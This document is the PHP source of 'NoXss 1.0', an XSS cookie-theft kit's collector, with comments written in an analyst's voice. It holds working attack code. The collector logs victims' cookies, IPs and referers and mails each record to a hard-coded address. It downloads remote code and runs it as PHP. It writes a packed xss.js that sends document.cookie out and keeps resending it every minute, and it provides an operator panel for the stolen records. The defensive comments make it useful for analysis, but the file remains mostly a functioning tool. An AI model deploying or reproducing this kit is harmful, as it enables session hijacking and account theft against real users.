NoXss Vol1.0
<?php
/*
 * NoXss 1.0 -- server-side collector of an XSS cookie-theft kit, annotated for analysis.
 *
 * Request handling visible in this file:
 *   - cookie=...&location=...   the submitted cookie string, location, client IP and Referer
 *                               are written to ./cookie/<timestamp>.noc and mailed over SMTP.
 *   - session=...               an hourly marker file is written under ./session/<YmdH>/.
 *   - pass=... [act=js|view|del, noc=...]   operator panel, gated by AppCheck().
 *
 * Artifacts this script creates next to itself: the directories cookie/ and session/
 * (both created with mode 0777), cookie/*.noc, session/<YmdH>/*.nos, mail.php (downloaded)
 * and xss.js (generated). On the victim side the traffic is a browser GET carrying
 * cookie= and location= parameters, followed by repeated GETs carrying session=.
 *
 * The collector only receives what page script can read: cookies flagged HttpOnly do not
 * appear in document.cookie, and output encoding plus a Content-Security-Policy that
 * restricts script sources stops the injected <script src=".../xss.js"> from loading.
 */
// All PHP diagnostics are suppressed, so the unset-variable reads below are silent.
error_reporting(0);
date_default_timezone_set('Asia/Shanghai');
// Operator configuration.
$password = ''; // Expected to hold md5(md5(passphrase)); empty here, and AppCheck() can never match an empty value.
$smtpserver = 'smtp.mail.yahoo.com.cn'; // SMTP server used for the notification mail
$smtpserverport = 25; // SMTP port
$smtpusermail = 'noevilsparrow@yahoo.cn'; // Sender address
$smtpemailto = 'inoevil@qq.com'; // Recipient of each captured record
$smtpuser = 'noevilsparrow@yahoo.cn'; // SMTP login
$smtppass = ''; // SMTP password (blank in this listing)
// Derive this script's own host+path; it is embedded into the generated xss.js and the mail body.
$shell = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];
$path = substr($shell, 0, strrpos($_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'], '/'));
// First-run setup. This is an else-if chain, so at most one step runs per request:
// create cookie/, else create session/, else fetch the mail class.
if(!file_exists('cookie') && !is_dir('cookie')) {
    mkdir('cookie',0777);
} else if(!file_exists('session') && !is_dir('session')) {
    mkdir('session',0777);
} else if(!file_exists('mail.php')) {
    // Remote content served with a .js name is saved locally as mail.php ...
    AppGetClass('https://files.cnblogs.com/noevil/class.mail.js');
}
// ... and executed here. Whatever that URL returns runs with this script's privileges;
// the outbound fetch and the new mail.php are both observable on the hosting server.
include ('mail.php');
// Dispatch on the query string.
if (isset($_GET['cookie'])) {
    // Capture path: reached by the victim's browser, no authentication.
    // $xss_ip is not assigned until two lines below, so this hashes an unset variable
    // (an empty string once coerced); the first line of every .noc file is that hash.
    $xss_hash = md5($xss_ip);
    $xss_date = date('Y/m/d H:i:s');
    $xss_ip = getenv ('REMOTE_ADDR');
    $xss_location = $_GET['location'];
    $xss_referer = getenv('HTTP_REFERER');
    $xss_cookie = $_GET['cookie'];
    AppSaveXss($xss_hash, $xss_date, $xss_ip, $xss_location, $xss_referer, $xss_cookie);
    // Mail the same record. Values are placed into the HTML body without encoding.
    global $shell; // no effect at file scope
    $contents = ' <p>Date : '.$xss_date.'</p> <p>IP : '.$xss_ip.'</p> <p>Location : '.$xss_location.'</p> <p>Referer : '.$xss_referer.'</p> <p>Cookie : '.$xss_cookie.'</p> <p>Hash : '.md5($xss_ip).'</p> <p>NoXss : '.$shell.'</p> ';
    AppSendMail('A Xss Info Had Got!' ,$contents);
} else if (isset($_GET['session'])) {
    // Keep-alive path: the submitted value is stored in $xss_cookie and not used again;
    // $xss_ip is never assigned in this branch, so AppKeepSession() receives an unset variable.
    $xss_cookie = $_GET['session'];
    AppKeepSession($xss_ip);
} else if ($_GET['act'] == 'js') {
    // Operator: regenerate xss.js
    if (AppCheck($password)) AppCreateJs();
} else if ($_GET['act'] == 'view') {
    // Operator: dump one .noc record
    if (AppCheck($password)) AppReadNox();
} else if ($_GET['act'] == 'del') {
    // Operator: delete one .noc record
    if (AppCheck($password)) AppDelNox();
} else {
    // Operator: list all records
    if (AppCheck($password)) AppViewXss();
}
/**
 * Panel login check.
 *
 * Reads the passphrase from the `pass` query parameter, so it appears in the URL and in
 * any access log that records query strings. Returns true when md5(md5(pass)) equals
 * $_p; otherwise prints a rejection string and returns nothing (null).
 */
function AppCheck($_p) {
    $pwd = $_GET['pass'];
    if (md5(md5($pwd)) != $_p) {
        echo 'Fuck You!';
    } else {
        return true;
    }
}
/**
 * Persist one captured record.
 *
 * File name is ./cookie/<Y-m-d-H-i-s>.noc, opened in append mode, so two hits within the
 * same second land in the same file. Layout, CRLF-separated:
 *   line 0: hash, line 1: "Date: ", line 2: "IP: ", line 3: "Location: ",
 *   line 4: "Referer: ", line 5: "Cookie: ".
 * All values are written as received; nothing is validated or encoded.
 * NOTE(review): the file sits below the script's own directory; whether the web server
 * serves it directly depends on server configuration -- relevant when scoping exposure.
 */
function AppSaveXss($_h, $_d, $_i, $_l, $_r, $_c) {
    $fp = fopen('./cookie/'.date("Y-m-d-H-i-s").'.noc', 'a');
    fwrite($fp, $_h."\r\n");
    fwrite($fp, 'Date: '.$_d."\r\n");
    fwrite($fp, 'IP: '.$_i."\r\n");
    fwrite($fp, 'Location: '.$_l."\r\n");
    fwrite($fp, 'Referer: '.$_r."\r\n");
    fwrite($fp, 'Cookie: '.$_c);
    fclose($fp);
}
/**
 * Send a notification mail with subject $_t and HTML body $_c using the configured
 * SMTP account. The `smtp` class is not defined in this file; presumably it comes from
 * the downloaded mail.php -- confirm against that file.
 */
function AppSendMail($_t, $_c) {
    global $smtpserver;
    global $smtpserverport;
    global $smtpusermail;
    global $smtpemailto;
    global $smtpuser;
    global $smtppass;
    $smtp = new smtp($smtpserver, $smtpserverport, true, $smtpuser, $smtppass);
    $smtp->debug = FALSE;
    $smtp->sendmail($smtpemailto, $smtpusermail, $_t, $_c, 'HTML');
}
/**
 * Render the operator panel: summary line, embed snippet, and one table row per .noc file
 * (newest last in the directory listing is shown first).
 *
 * Stored fields and request headers are concatenated into the HTML without encoding, so
 * the contents of .noc files should be treated as untrusted when a seized instance is
 * examined; read the files as text rather than through this page.
 */
function AppViewXss() {
    global $smtpusermail;
    global $smtpemailto;
    // Page header and inline stylesheet.
    print_r(' <HTML> <HEAD> <TITLE>NoXss</TITLE> <STYLE type="text/css"> body,th,td { font:12px Verdana,Tahoma,sans-serif; color:black; line-height:140%; } .info li { line-height:35px; border-bottom:1px dashed #DDD; border-bottom-width:1px; border-bottom-style:dashed; border-bottom-color:#DDD; clear:both; } th { font-weight:bold; text-align:left; } th,td { line-height:35px; border-bottom:1px dashed #DDD; border-bottom-width:1px; border-bottom-style:dashed; border-bottom-color:#DDD; clear:both; } ul,ol { list-style:none; list-style-type:none; list-style-position:initial; list-style-image:initial; } li { display:list-item; } 
</STYLE> </HEAD> <BODY> ');
    print_r('<ul class="info">');
    // Summary: time, host, record count, mail settings, and the script tag that loads xss.js.
    global $path;
    $noc = AppGetNox('cookie');
    print_r(' <li><h1>NoXss</h1></li> <li> Date: <font color="#CC0000">'.date('Y/m/d H:i:s').' </font> Host: <font color="#CC0000">'.$_SERVER['HTTP_HOST'].' ('.gethostbyname($_SERVER['SERVER_NAME']).') </font> Count: <font color="#CC0000">'.count($noc).' </font> </li> <li> SEND USER: <font color="#CC0000">'.$smtpusermail.' </font> SEND TO: <font color="#CC0000">'.$smtpemailto.' </font> </li> <li>Use Example: <font color="#CC0000"><SCRIPT SRC="HTTP://'.$path.'/xss.js"></SCRIPT> </font> [<a href="http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'].'&act=js">Creat Js</a>]</li> ');
    // Table header.
    print_r(' <li> <table> <tr> <th width="180px">Name</th> <th width="200px">Date</th> <th width="150px">Ip </th> <th width="420px">Referer</th> <th width="100px">Status</th> <th width="100px">Action</th> </tr> ');
    // One row per record, iterating the directory listing backwards.
    for ($i=count($noc)-1; $i>=0; $i--) {
        // Load the record into $nocdata by line index (see AppSaveXss for the layout).
        // NOTE(review): $nocdata is not reset per file, so a short file would show
        // fields left over from the previously rendered row.
        $nocfile = file('./cookie/'.$noc[$i].'.noc');
        $j = 0;
        foreach($nocfile as &$line) {
            $nocdata[$j] = $line;
            $j++;
        }
        // Action links reuse the current REQUEST_URI, which already carries pass=.
        print_r(' <tr> <td>['.$noc[$i].']</td> <td>'.$nocdata[1].'</td> <td>'.$nocdata[2].'</td> <td title="'.$nocdata[4].'">'.AppSubStr($nocdata[4], 0, 55).'</td> <td>'.AppCheckStatus($nocdata[0]).'</td> <td>[ <a href="http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"].'&act=view&noc='.$noc[$i].'" target="_blank"> <font color="#ff6600">View</font></a> | <a href="http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"].'&act=del&noc='.$noc[$i].'"> <font color="#ff6600">Delete</font></a> ]</td> </tr> ');
    }
    // Footer.
    print_r(' </table></li> <li><font color="#DDDDDD">Code By : NoevilSparrow @:no3er@qq.com Version: 1.0</font></li> </ul></BODY></HTML> ');
}
/**
 * Record a keep-alive marker for the current hour.
 *
 * Markers live in ./session/<YmdH>/<md5($_c)>.nos. When the directory for the current
 * hour does not exist yet it is created and every other directory under ./session/ is
 * removed, so markers expire at the hour boundary.
 */
function AppKeepSession($_c) {
    $session_hash = md5($_c);
    // Roll over to a new hourly directory.
    if (!is_dir('session/'.date('YmdH'))) {
        // Create the current-hour folder, then delete all sibling folders.
        mkdir('session/'.date('YmdH'));
        $handle = @opendir('./session/');
        for ($i=0; $dir = @readdir($handle); $i++) {
            if (@is_dir('./session/'.$dir) && $dir!='.' && $dir!='..') {
                if ($dir != date('YmdH')) {
                    AppCleanSession('./session/'.$dir);
                }
            }
        }
        closedir($handle);
    }
    // Write the marker once; its content is the hash itself.
    if (!file_exists('./session/'.date('YmdH').'/'.$session_hash.'.nos')) {
        $fp = fopen('./session/'.date('YmdH').'/'.$session_hash.'.nos', 'a');
        fwrite($fp, $session_hash);
        fclose($fp);
    }
}
/**
 * Recursively delete directory $_d: files are unlinked, sub-directories are handled by
 * recursion, then the directory itself is removed. Returns the result of rmdir() as a bool.
 */
function AppCleanSession($_d) {
    $dh = opendir($_d);
    while ($file = readdir($dh)) {
        if($file!='.' && $file!='..') {
            $fullpath = $_d.'/'.$file;
            if(!is_dir($fullpath)) {
                unlink($fullpath);
            } else {
                AppCleanSession($fullpath);
            }
        }
    }
    closedir($dh);
    if(rmdir($_d)) {
        return true;
    } else {
        return false;
    }
}
/**
 * Panel status cell for a record: "Keeping" when a marker named after the trimmed hash
 * $_h exists in the current-hour session directory, "Lost" otherwise.
 */
function AppCheckStatus($_h) {
    $_h = trim($_h);
    if (file_exists('./session/'.date('YmdH').'/'.$_h.'.nos')) {
        return '<font color="#006600">Keeping</font>';
    } else {
        return '<font color="#0000FF">Lost</font>';
    }
}
/**
 * List directory $_p and return each entry name up to its first dot, skipping ".", ".."
 * and "Thumbs.db".
 * NOTE(review): $_r is only assigned inside the loop, so a missing or empty directory
 * returns an unset value rather than an empty array.
 */
function AppGetNox($_p) {
    if (is_dir($_p)) {
        if ($handle = opendir($_p)) {
            for ($i=0; ($file = readdir($handle)) !== false; ) {
                if($file != "." && $file != ".." && $file != "Thumbs.db") {
                    $temp = explode('.',$file);
                    $_r[$i] = $temp[0];
                    $i++;
                }
            }
            closedir($handle);
        }
    }
    return $_r;
}
/**
 * Download URL $_u in 8 KiB chunks and write it to mail.php in the current directory.
 * No integrity or content check is applied to what is downloaded; the caller includes
 * the result as PHP.
 */
function AppGetClass($_u) {
    $file = fopen ($_u, 'rb');
    if ($file) {
        $fp = fopen('mail.php', 'wb');
        if ($fp) while(!feof($file)) {
            fwrite($fp, fread($file, 1024*8 ), 1024*8);
        }
    }
    if ($file) {
        fclose($file);
    }
    if ($fp) {
        fclose($fp);
    }
}
/**
 * (Re)write xss.js next to this script, then send the operator's browser back one page.
 *
 * The file starts with `var _u = "http://<this script>";` followed by a packed
 * `eval(function(p,a,c,k,e,d)...` blob. The blob's keyword table (document, cookie,
 * top, location, escape, XMLHttpRequest, GET, session, setInterval, 60000) reads as:
 * one GET to _u with cookie=escape(document.cookie) and location=top.location, then a
 * GET with session=escape(document.cookie) every 60000 ms. That reading was done by
 * hand from the table -- confirm by unpacking in an isolated environment.
 * Both the `var _u` prefix and the packer signature are usable as content signatures.
 */
function AppCreateJs() {
    global $shell;
    $fp = fopen('xss.js', 'w');
    fwrite($fp, 'var _u = "http://'.$shell.'";');
    fwrite($fp, 'eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!\'\'.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return\'\\\\w+\'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}return p}(\'1 6="3="+9(b.3)+"&8="+l.8;1 i="m="+9(b.3);1 0=a 7();1 2=a 7();5();e();4 5(){0.c("j",k+"?"+6,g);0.h(d);p 0}4 f(){2.c("j",k+"?"+i,g);2.h(d)}4 e(){n.q("f()",o)}\',27,27,\'_hc|var|_hs|cookie|function|C|_c|XMLHttpRequest|location|escape|new|document|open|null|K|S|true|send|_s|GET|_u|top|session|window|60000|delete|setInterval\'.split(\'|\'),0,{})) ');
    fclose($fp);
    print_r('<script type="text/javascript">history.back();</script>');
}
/**
 * Character-wise substring for UTF-8 text.
 *
 * Splits $_s into characters with a /./u match, then returns the slice starting at $_f.
 * When $_l is given and the string is at least $_l characters long, the slice is limited
 * to $_l characters and '...' is appended; otherwise the rest of the string is returned.
 */
function AppSubStr($_s, $_f, $_l = null) {
    preg_match_all('/./u', $_s, $match);
    $strlength = count($match[0]);
    if (is_null($_l) || $strlength < $_l) {
        $result = implode('', array_slice($match[0], $_f));
    } else {
        $result = implode('', array_slice($match[0], $_f, $_l)).'...';
    }
    return $result;
}
/**
 * Print one record line by line, each followed by <br>. The file name is taken directly
 * from the `noc` query parameter and the lines are emitted without HTML encoding.
 */
function AppReadNox() {
    $nocfile = file('./cookie/'.$_GET['noc'].'.noc');
    foreach($nocfile as &$line) {
        print_r($line.'<br>');
    }
}
/**
 * Delete one record. The file name is taken directly from the `noc` query parameter.
 * On failure an alert is shown; on success the browser is redirected to the request's
 * Referer header, which is written into the script block as received.
 */
function AppDelNox() {
    if (!unlink('./cookie/'.$_GET['noc'].'.noc')) {
        print_r('<script type="text/javascript">alert("What is the fuck!");history.back();</script>');
    } else {
        print_r('<script 
type="text/javascript">top.location="'.getenv('HTTP_REFERER').'";</script>');
    }
}
?>